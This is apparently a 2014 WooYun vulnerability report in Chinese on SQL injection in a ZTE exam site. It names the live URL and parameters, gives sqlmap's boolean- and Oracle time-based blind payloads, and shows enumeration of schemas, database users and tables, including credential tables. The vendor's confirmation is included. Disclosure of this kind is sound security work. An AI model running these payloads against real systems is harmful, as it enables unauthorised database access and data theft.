当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052183

漏洞标题:中兴某站SQL注射

相关厂商:中兴通讯股份有限公司

漏洞作者: U神

提交时间:2014-03-01 16:54

修复时间:2014-04-15 16:55

公开时间:2014-04-15 16:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-01: 细节已通知厂商并且等待厂商处理中
2014-03-03: 厂商已经确认,细节仅向厂商公开
2014-03-13: 细节向核心白帽子及相关领域专家公开
2014-03-23: 细节向普通白帽子公开
2014-04-02: 细节向实习白帽子公开
2014-04-15: 细节向公众公开

简要描述:

详细说明:

URL:http://univ1.zte.com.cn/XsExam/Application/ForePlatform/Exam_ErrorQestion_Analyse.aspx?examNo=55239&studentNO=20070910056177
基于布尔值的盲注
[*] starting at 17:58:26
[17:58:26] [INFO] resuming back-end DBMS 'oracle'
[17:58:26] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: examNo
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: examNo=55239' AND 3796=3796 AND 'IqXn'='IqXn&studentNO=200709100561
77
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: examNo=55239' AND 5439=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(75)||
CHR(97)||CHR(79),5) AND 'SRkp'='SRkp&studentNO=20070910056177
Place: GET
Parameter: studentNO
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: examNo=55239&studentNO=20070910056177' AND 4317=4317 AND 'fBuR'='fB
uR
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: examNo=55239&studentNO=20070910056177' AND 1817=DBMS_PIPE.RECEIVE_M
ESSAGE(CHR(75)||CHR(99)||CHR(104)||CHR(76),5) AND 'alET'='alET
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: studentNO, type: Single quoted string (default)
[1] place: GET, parameter: examNo, type: Single quoted string
[q] Quit
>
[17:58:36] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
[17:58:36] [INFO] fetching current database
[17:58:36] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:58:36] [INFO] retrieved:
[17:58:37] [WARNING] reflective value(s) found and filtering out
XSEXAM
current schema (equivalent to database on Oracle): 'XSEXAM'
[17:59:08] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[17:59:08] [INFO] fetching database (schema) names
[17:59:08] [INFO] fetching number of databases
[17:59:08] [INFO] resumed: 30
[17:59:08] [INFO] resumed: ADAPTEXAM
[17:59:08] [INFO] resumed: AMP
[17:59:08] [INFO] resumed: CTXSYS
[17:59:08] [INFO] resumed: DBSNMP
[17:59:08] [INFO] resumed: DMSYS
[17:59:08] [INFO] resumed: DSC
[17:59:08] [INFO] resumed: DSCMD
[17:59:08] [INFO] resumed: EASK
[17:59:08] [INFO] resumed: ELEARNING
[17:59:08] [INFO] resumed: EMPTRAIN
[17:59:08] [INFO] resumed: EMPTRAIN2004
[17:59:08] [INFO] resumed: ETS
[17:59:08] [INFO] resumed: ETS_INTERFACE
[17:59:08] [INFO] resumed: EUNIV
[17:59:08] [INFO] resumed: EVALCENTER
[17:59:08] [INFO] resumed: EXFSYS
[17:59:08] [INFO] resumed: LHC
[17:59:08] [INFO] resumed: MAIL_SERVICE
[17:59:08] [INFO] resumed: MDSYS
[17:59:08] [INFO] resumed: OLAPSYS
[17:59:08] [INFO] resumed: ORDSYS
[17:59:08] [INFO] resumed: OUTLN
[17:59:08] [INFO] resumed: SYS
[17:59:08] [INFO] resumed: SYSMAN
[17:59:08] [INFO] resumed: SYSTEM
[17:59:08] [INFO] resumed: TSMSYS
[17:59:08] [INFO] resumed: WMSYS
[17:59:08] [INFO] resumed: XDB
[17:59:08] [INFO] resumed: XSEXAM
[17:59:08] [INFO] resumed: ZTETRAIN
available databases [30]:
[*] ADAPTEXAM
[*] AMP
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DSC
[*] DSCMD
[*] EASK
[*] ELEARNING
[*] EMPTRAIN
[*] EMPTRAIN2004
[*] ETS
[*] ETS_INTERFACE
[*] EUNIV
[*] EVALCENTER
[*] EXFSYS
[*] LHC
[*] MAIL_SERVICE
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XSEXAM
[*] ZTETRAIN

漏洞证明:

Users:
database management system users [49]:
[*] ADAPTEXAM
[*] AMP
[*] ANONYMOUS
[*] BACKUPUSER
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] DSC
[*] DSCMD
[*] EASK
[*] ELEARNING
[*] EMPTRAIN
[*] EMPTRAIN2004
[*] ETS
[*] ETS_INTERFACE
[*] EUNIV
[*] EVALCENTER
[*] EXFSYS
[*] HR_SLT
[*] LHC
[*] MAIL_SERVICE
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NC_READER
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TIVOLI
[*] TO_DSS
[*] TO_ESEARCH
[*] TO_ETS
[*] TO_FOL
[*] TO_HR
[*] TPG
[*] TSMSYS
[*] UNIVARCHIVE
[*] UNIVDB_DMOLVIEW
[*] WMSYS
[*] XDB
[*] XSEXAM
[*] ZTETRAIN
Tables:
Database: DMSYS
[2 tables]
+-------------------+
| DM$P_MODEL |
| DM$P_MODEL_TABLES |
+-------------------+
比较慢我就跑到这里把。。
[18:08:06] [INFO] fetching tables for database: 'XSEXAM'
[18:08:06] [INFO] fetching number of tables for database 'XSEXAM'
[18:08:06] [WARNING] running in a single-thread mode. Please consider usage o
ption '--threads' for faster data retrieval
[18:08:06] [INFO] retrieved:
[18:08:08] [WARNING] reflective value(s) found and filtering out
142
[18:08:28] [INFO] retrieved: TMP_ANSWER_LOG_TMP
[18:12:30] [INFO] retrieved: ATMP_ID
[18:14:10] [INFO] retrieved: ATMP_ID_UPDID
[18:15:54] [INFO] retrieved: BACKUP_1
[18:17:42] [INFO] retrieved: CHECK_EMPLOYEEBASE_INFO
[18:22:34] [INFO] retrieved: EXAM_ANSWER_57721
[18:26:21] [INFO] retrieved: EXAM_ANSWER_TEMP_UPDID
[18:29:05] [INFO] retrieved: EXAM_AUTOJUDGE_QUEUE
[18:32:20] [INFO] retrieved: EXAM_BASE_DEFINE
[18:34:57] [INFO] retrieved: EXAM_COPY_SUCCEED
[18:37:48] [INFO] retrieved: EXAM_COPY_SUCCEED_UPDID
[18:39:52] [INFO] retrieved: EXAM_DIC_DIFFICULT
[18:42:51] [INFO] retrieved: EXAM_EXAMINATION_EX
[18:46:10] [INFO] retrieved: EXAM_FILE_QUEUE
[18:48:33] [INFO] retrieved: EXAM_FILE_QUEUE_HISTORY
[18:50:57] [INFO] retrieved: EXAM_GROUP_INFO
[18:53:27] [INFO] retrieved: EXAM_GROUP_INFO_UPDID
[18:55:31] [INFO] retrieved: EXAM_GROUP_USER
[18:56:56] [INFO] retrieved: EXAM_GROUP_USER_UPDID
[18:58:55] [INFO] retrieved: EXAM_JUDGING_CONFIG
[19:02:11] [INFO] retrieved: EXAM_JUDGING_CONFIG_UPDID
[19:04:20] [INFO] retrieved: EXAM_LEVEL_TEMPLATE_UPDID
[19:08:58] [INFO] retrieved: EXAM_MEMBERLIST
[19:11:21] [INFO] retrieved: EXAM_OBJECT_EXAM
[19:13:58] [INFO] retrieved: EXAM_OBJECT_EXAM_TEST
[19:15:53] [INFO] retrieved: TMP_ANSWER_LOG_71913
[19:20:18] [INFO] retrieved: EXAM_TQ_EES_BL_UPDID
[19:24:42] [INFO] retrieved: EXAM_TQ_EES_CA
[19:25:43] [INFO] retrieved: EXAM_TQ_EES_CA_UPDID
[19:27:39] [INFO] retrieved: EXAM_TQ_EES_GR
[19:28:42] [INFO] retrieved: EXAM_TQ_EES_GR_SELITEMS
[19:31:15] [INFO] retrieved: EXAM_TQ_EES_GR_UPDID
[19:33:01] [INFO] retrieved: EXAM_TQ_EES_JU
[19:34:04] [INFO] retrieved: EXAM_TQ_EES_JU_UPDID
[19:36:09] [INFO] retrieved: EXAM_TQ_EES_LI
[19:37:12] [INFO] retrieved: EXAM_TQ_EES_LI_SELITEMS
[19:39:46] [INFO] retrieved: EXAM_TQ_EES_LI_UPDID
[19:41:32] [INFO] retrieved: EXAM_TQ_EES_MS
[19:42:35] [INFO] retrieved: TMP_ANSWER_20090617_2
[19:47:22] [INFO] retrieved: TMP_ANSWER_20090617_2_UPDID
[19:49:36] [INFO] retrieved: TMP_ANSWER_20090617_UPDID
[18:41:29] [INFO] fetching tables for database: 'SYSMAN'
[18:41:29] [INFO] fetching number of tables for database 'SYSMAN'
[18:41:29] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:41:29] [INFO] retrieved:
[18:41:30] [WARNING] reflective value(s) found and filtering out
341
[18:41:52] [INFO] retrieved: MGMT_CREDENTIAL_SETS
[18:46:23] [INFO] retrieved: MGMT_CREDENTIAL_SET_COLUMNS
[18:49:05] [INFO] retrieved: MGMT_CREDENTIALS2
[18:50:18] [INFO] retrieved: MGMT_NOTIFY_QTABLE
[18:53:28] [INFO] retrieved: AQ$_MGMT_NOTIFY_QTABLE_S
[18:58:57] [INFO] retrieved: SYS_IOT_OVER_50179
[19:03:07] [INFO] retrieved: MGMT_VERSIONS
[19:06:12] [INFO] retrieved: MGMT_TABLE_SIZES
[19:08:56] [INFO] retrieved: MGMT_INDEX_SIZES
[19:11:42] [INFO] retrieved: MGMT_REBUILD_INDEXES
[19:15:21] [INFO] retrieved: MGMT_LICENSES
[19:17:25] [INFO] retrieved: MGMT_AVAILABILITY
[19:20:17] [INFO] retrieved: MGMT_CURRENT_AVAILABILITY
[19:24:59] [INFO] retrieved: MGMT_AVAILABILITY_MARKER
[19:29:21] [INFO] retrieved: MGMT_MASTER_AGENT
[19:32:18] [INFO] retrieved: MGMT_MASTER_CHANGED_CALLBACK
[19:36:22] [INFO] retrieved: MGMT_TARGET_BASELINES
[19:40:09] [INFO] retrieved: MGMT_TARGET_BASELINES_DATA
[19:42:11] [INFO] retrieved: MGMT_METRICS
[19:44:03] [INFO] retrieved: MGMT_METRICS_EXT
[19:45:40] [INFO] retrieved: MGMT_TARGET_TYPES
[19:48:41] [INFO] retrieved: MGMT_TARGETS
[19:49:31] [INFO] retrieved: MGMT_TYPE_PROPER

修复方案:

版权声明:转载请注明来源 U神@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-03-03 09:18

厂商回复:

感谢U神,相关漏洞会尽快修复,谢谢

最新状态:

暂无